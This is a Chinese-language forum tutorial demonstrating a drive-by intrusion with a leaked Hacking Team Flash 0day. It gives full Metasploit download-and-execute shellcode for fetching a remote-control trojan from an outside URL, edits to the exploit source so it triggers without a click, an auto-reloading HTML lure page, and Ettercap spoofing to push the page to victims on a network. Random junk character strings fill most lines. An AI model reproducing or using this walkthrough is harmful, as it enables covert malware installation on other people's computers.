) \; t# J: i/ ?8 D
三、flash 0day之手工代码修改制作下载者实例入侵演示
0 q7 a2 L1 u7 J- z9 t
. P. r9 X* s# \9 m: f5 s8 t" B- I! r9 B" L
利用到的工具: % B4 O) S0 ^; h. G7 p( d6 J/ `
9 C2 F2 c4 X7 f2 E( J
* \" T! T0 c& w/ J' U# w4 z Msf ) F0 M) m _8 c$ U# l1 }- g
, R( W4 ]) w8 X- M1 k! H4 q) n) D& D2 G2 t
Ettercap 1 n) x: M9 o, V* X
! ?, K$ g% Y/ v& b; w3 ^
; @/ {9 j% K0 h3 {# y! h4 h4 h Adobe Flash CS6 6 ?9 s# K6 R S# Z; W+ }
* S! Y+ i9 C& v1 b5 ~1 B: U
$ `8 U# s8 x8 M; l5 Y
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ! C3 n6 B# N4 A S& ~
+ V; }: c/ K* U5 ] e
9 B' F5 g" @! ?5 T( y
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 7 C, q. d! Y+ K% a: q% D
. I5 B# p/ V8 G7 b
- n. z" I. G- h! V5 e' \1 C 如图:
" j! Q0 E1 u- x! n% I- }* ~ ; P) {9 D9 r( b9 j+ n3 J+ m
' a2 [) Z* O4 ?/ b4 [" E
/ K7 p/ \6 M4 P4 |4 ]
3 V4 S/ E; S) n& |% R# ?
" L+ N7 v: o" ?) h' J) B. g , Z, W% `$ g* V( h6 }3 C: A" h
8 E. K4 ~; I. i" y; T i p5 {' ]
7 N6 V! c4 q6 i+ `0 C$ W 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
4 ]# M; v* d! A# N1 H- i 7 }9 [9 O: s9 X/ ]7 _
+ |2 m. r, O# q1 z& X
8 u1 j2 S: q- E3 `: d( p
0 p# y1 _0 |6 K
; {6 {9 r+ U, x1 D0 _! t# y 9 H) \) @0 M! G z9 G2 l, s
5 M% y! Q5 j" G6 Y& F1 g0 H9 [- v7 T
然后执行generate -t dword生成shellcode,如下:
* `( \: B8 z. p; J9 `
( J2 p7 v. L3 g% H$ }2 F
# ?0 T# F" ^# p9 J4 m ' R4 ]! n! }) z3 ?" Q$ B
- M6 [3 E; G! ]
7 |3 w# ~5 a1 e- e+ v' g 复制代码到文本下便于我们一会编辑flash exp,如下:
% }0 ?$ t* w! `: R5 f7 X 1 m- }2 _4 e5 p( X* d. e
. j8 j! e) M1 \! g: R! x
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
" S8 j$ U. ]% z( V* |/ U 9 j7 D6 @8 @ P
$ _0 K3 Y/ U0 X+ m4 H
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, # n; t* L; F# a9 [7 _# B; q* M
- I% C3 ^1 d( {2 O g& F$ D
5 Q8 y+ T7 L6 j5 O) Y' }
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
' ~' I& ^, i b9 `! U! v& P; D5 c
* D, V+ Q1 i$ F/ q6 A+ ^: s- V4 `. {0 W
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 0 K' L8 l3 T/ ^% e" N/ T! R
8 L! V; y+ m# Q& q1 X
f7 R" ^: Z: y9 f: z5 G Q: x
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ' H f% ~4 r3 b2 D& G/ [# E
+ B: o$ `( e8 I: W6 X$ S v
1 v* @, O7 x* @# `0 Q
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
3 ]7 p! h, x) q) I# E0 N8 U( N" @$ f
5 ~0 @. x; W2 g- m7 K2 A U4 {
+ t/ F6 U: C: b( i$ w. } 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
' j' K7 W5 Z+ |: m9 j6 w
+ A2 Y5 D7 b4 O$ M! p) T1 B8 \# G( K0 D& y' t* c8 ^' ?8 Q1 _
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, # W! i7 A2 }" M# s1 m
4 _: \: ~+ }) r C
7 S a8 @8 K9 J3 `2 D, } 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, $ `' x; z7 O# U$ h
0 @1 c2 w# n) u
% x$ j5 R; { }0 _9 _5 J5 k2 _! n 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, . c. }( Q" Z) M, m/ B: ?) r
9 h; p$ m1 n) {0 B- i9 B F) e2 i% K; ]: H7 k; o- _! z1 Y7 P! J6 `- G
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, : g0 [) j# i: p7 X8 p2 w
# V8 w) A" k6 l- F' F
5 \# A: e3 ] e2 S' z6 D* C! E 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 1 ~, c' u$ E, k+ k! @: k$ ~* L. v
% m: H$ E# f8 U6 f& \% t! w
; t: f w+ J) e& _7 f 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
/ ~+ @( |' e; U: K+ N7 V: I+ ]
6 u. z, c: i P# a4 I2 O* a9 y: W/ n8 ^- W! c( R
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 # l0 y! m2 z3 q8 E% m: _0 U4 N+ K/ |% l
& e1 ^' z6 P/ g+ L' x% c x7 t' V1 G; y$ W& C& n
$ G6 W+ i5 g; C3 N- m( ^7 o- e' q 8 q) y' L% ~ b9 V/ }. m! Q
9 i/ K) ] M- l+ e6 f( p
/ V( D3 u9 \( ?, H& u8 M+ e: a# [
' X8 f$ U. v$ ]. p& C" P% g5 u# X7 _; w' }, E
下面我们来修改flash 0day exp,需要修改三个文件,分别为: - ~. v+ k0 l3 u) y4 V2 |
# A$ K$ s- |, p! d ~2 _% q. N. d' h% }
}$ I( X, y8 i1 F
3 @) t4 M7 T2 H/ X6 r
4 E. |) r; W2 Z( a* d1 w 先修改ShellWin32.as,部分源代码如图: ! o2 w" k0 H0 Z# y" y% G5 x
8 w* [" g" q' |/ V
. |1 A; E- c/ t3 b$ G* I ! A, w9 B. e$ C. i
6 @3 B8 ^7 R0 u: Z! d7 ]
) x* ~0 R. X5 C/ O4 R0 A
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
4 Z+ n& s7 \- C. d/ ~6 K
" M9 W- \4 f$ Y1 e8 }5 H4 H6 A t% {- }$ Q8 i
" G% r+ v; a3 \0 n6 Y( h 4 Y( j9 [% O, ?6 n" ?- {
; j$ S. x* D( y6 j3 a9 L: U) h1 D* ^
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ; M& Y" R% ^4 {" V) h
* D3 ]3 T" f& s) [# E
: O0 k" |. }" v2 ]7 c
M) c/ ]$ t3 G0 v$ u5 F
6 C" ~6 p2 R3 {8 a
5 s8 |9 @ z0 W# d, m: `$ j9 A( P, j 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: T) \0 T, I" k" h
* |5 K4 M! C- u, l1 X, Q; Z& e6 V& O% B8 B, b7 H; d8 ]
8 N5 p( h* W. I, L0 d! m5 d
E2 C/ R7 H" m; ~5 b
7 H, \( l, i2 x. W7 u$ ?: Y
6 Z5 Y3 n X9 J/ v2 C/ }# f
8 N; K$ P" \: l1 }0 x: i3 W
' F0 L$ G7 G3 e ( J3 h2 L, e7 V
5 }( `: ]6 D8 i7 l0 \8 r$ @2 G; B
0 `. b/ t+ y) ~! S4 e5 x 然后点保存,下面我们来编译一下,打开 ; g4 n& d! S: w2 ~
6 z' u7 f$ i" A. J4 Z$ J( ~3 I+ w b, g8 K
exp1.fla然后点文件-发布,看看编译没错误
5 f+ C# t+ z8 d
( {. t; ^+ M6 W' s6 ]
0 Y# V3 C% X& t3 j& Z 7 I. N: z5 g5 y( g
" z8 m8 c# s$ V* i9 z H, N$ `. ~
# P* j8 p+ o B( x( w. E
& e$ D4 B! ~: s( D: `8 W5 F$ i b, }! s. O b
) i8 @, o/ b" `/ A8 ?. ?( i & ], r/ f6 N9 \% ]% W) E( P
# ~0 a& B8 O/ ]3 E2 R* O3 U6 p
) k4 {( A' H8 `( r( @" t
7 T2 I! G$ u6 l; {3 Z( j6 z8 g% Z) N7 _9 K. R. _5 e
然后我们把生成的 * Z. y9 Q* _; }
4 s* E1 S) V% h. q3 f0 U
# ^+ Y1 ~' K- l8 [ exp1.swf丢到kailinux 的/var/www/html下:
+ `4 i$ l7 k- T, ?' M
0 K' Q( c( d2 |, d/ V. T& x. O
9 s3 \# D) f5 s; k6 t4 ~8 x ? 然后把这段代码好好编辑一下 0 ^: O' t+ R' v
4 C9 a* k: [8 s9 ]5 t2 O" w
# M2 i( k( i3 q9 l# ]4 e 5 f+ b5 h$ G d; x4 t- O5 ~( q
- }( D% {- l$ i; h! t' q. _3 w+ x
+ Q& _2 c* f/ J
% ?9 Y7 C4 l: ^. R5 W( g
3 o0 |4 W! C5 D1 |# f/ J
- a1 N, t! Y, ^) S7 W6 N2 J
- f0 A* [0 I/ a, ?
3 R1 b( H7 K, ]6 G3 R9 o 3 o; [$ i" d4 w1 d0 x0 ]' z a
; \6 L$ x( d$ G7 P
6 j7 o4 [& |4 w, I
9 ~* W8 g' B1 Q+ k i+ G* q . s2 y- L( A n* \
' U/ E# K$ i/ B3 E
. `- g; m! b+ h4 r; B+ _! p0 F1 ~3 J
7 u/ b2 n: \, [5 b6 e9 ]: g% u a0 O+ Z0 p! v5 f
<!DOCTYPE html>
1 Y! `7 p3 Y( w& T9 r1 C 5 h+ O* @6 R0 E
; g/ B" [2 r4 v+ `, w7 |* C
<html>
+ f2 G$ P) Y B9 R# Z9 Y0 ]* p . ?. h7 w9 b. ~# G
" x1 B, D- g* ^ m* b
<head>
$ n% \* O) `0 |5 B* T2 P
) M2 b" i+ \5 C8 F1 B
4 m' ?( l: H9 G1 F6 \2 a$ C: w9 n <meta http-equiv="Content-Type" content="text/html; / i1 W1 l6 I; {/ x( }! |2 B
) C$ J9 @+ @( |& d. r
$ @& |- y1 F+ A' c4 n1 M charset=utf-8"/> 4 q3 G! k+ l: o9 j2 ?+ H% N
8 T% ]0 R0 \* A: X
h7 T. _( T5 D- v7 |7 J </head>
, b' Y! y [: e
8 b/ i$ H* y! [, ~
7 d3 q$ ]# l5 _1 f! V7 Z. g; | <body> W7 _5 ?1 E) ?# `9 K
3 r8 p4 |! x9 \! r' Y
, Z6 C; l" _- ]
<h2> Please wait, the requested page is loading...</h2>
" U1 L# _# ?: O' V; z- k$ x ( M* r9 S- q( a( j# s/ V: }6 w
1 M. [ m3 X! D) t
<br> 3 v5 Z. V9 z! o" e W+ x; v
$ w. d( J7 }1 c9 s# Y# _! Z9 W n& @# e3 c( ] z+ \# s1 F
<OBJECT 0 s! Y0 M6 w, y- _* r
/ e3 X) |) C" _
' Y i, y4 {% S9 [$ l
classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ( Z0 Q& [7 O8 F0 f
+ G5 `% V6 d9 V/ u1 Z7 z
0 N2 _2 o; O3 y+ g
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 7 q- F- Z4 \7 b. a/ T3 a# Q$ K
$ N3 V5 X3 }7 l# ^- t) k {- _3 |
f; r" P6 o+ T# M @4 B </body> * v1 P$ W* a( U( n- Z- K- Y5 c
( x( y& r7 r8 K; v# t8 y
1 I5 T9 S9 B+ Y" |: s6 Y* w# A <script> 1 w/ V# w' s0 W! `" a# t5 t6 D
; i7 V8 K) F4 V1 b4 c) n
: q8 P( l: N b* \ setTimeout(function () {
8 z S5 r3 W4 a( ^+ d# r6 D0 @
# b9 d' z7 q& y+ d2 f) f* y: d/ [ X
" ]; i5 I1 h9 b5 K 7 k0 S. A1 u6 _5 r* Y9 ]" o
3 \4 G# ~5 E( u
window.location.reload();
/ T* }* i+ g3 E$ W 7 `" A5 _" C+ R2 \$ S! ]
( Z9 H3 ?' f) Q. h }, 10000); : y3 _+ U6 O- ^
8 b6 ^" D& b) |# z
3 c/ U1 {9 o% d2 T; a
% V6 f, @' j3 _' n$ n8 Z; i7 {
3 @ T( R: g3 g' M: m+ N2 N9 r) g& G+ `& d4 K
</script> + A% M" Y e& F: |6 \! \3 k
" I, [* P) Y% e8 ]
, z6 s- x2 y1 a/ G b) e
</html>
$ e+ f0 d+ o) ^6 F: U
! S$ G7 l2 L! Q, z3 c6 h: E6 O" l. p
4 I \( r* t# p! i: J: J
2 A @+ O5 W3 ^6 u) o
. w* x D8 |8 Q \% u/ b+ X/ X! \* }4 c# _6 N! q: W
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) [/ ^; F" J. [' N
r$ \3 M9 p9 l6 e( M5 D4 k
" R. D9 J# G) `9 i3 u$ W* K& N$ [3 \- Y
7 `1 F. n( D4 {/ ^" w8 X8 V
: x; p' n# x5 l2 ~8 A- |# @6 u4 B# a/ l+ U
6 V9 ]/ b: n. B: |1 F
7 R- ^ e" o6 i2 ^% m+ h, E3 F: w/ K8 h K8 H
5 D: T6 {3 a. e, [/ L
0 _1 e5 Y* Y1 u. B1 E+ l
& m* a4 R' r, j3 d7 h# ^5 F ! ^+ O5 t9 E( Z& m1 I
( t( ~: y5 V3 R8 q( ]% e
6 M' L7 w. p8 t# ?
& \, {( j7 _% t2 K: n. f5 p 0 o/ C4 A/ H- h
8 Z$ a: @( |8 D+ p
下面我们用ettercap欺骗如图:
$ x3 u* t1 z3 l - m4 L3 B! z0 L7 H
# F6 J, X' R2 `% h) b' _1 q
/ U+ F- }6 a: s : m P9 K" X3 i/ Y D; b
% ^' n0 }9 w6 ]( d - d+ K+ X, G% }/ w5 t5 k1 a: L( y- _
6 u- |/ n& k3 Q3 K- b# h
; R. d+ ~" j8 ^- ^ 下面我们随便访问个网站看看:
2 m+ [5 s, R# T" x/ ~+ _6 E; ]
) r( g, S% l H3 ^6 p4 E2 x/ `$ n5 E" X* a2 O7 o/ v7 R! ~
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
) C& y. {9 y( ^( E ! q3 q1 X4 q% ^6 f. u; G
8 g% j5 y7 U0 @) E- W E
$ c) C! f1 H! C5 n' A* k
7 v5 \- g- m! c, b. A J Q
! t. e) A( I J: |- i 我们看另一台,
% d# z* E0 G0 C
: @7 X8 C2 a$ U$ L8 W. B
4 l; p1 P" N M/ z! U 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ! [( B/ H; s3 T- x3 D' ^% Q
|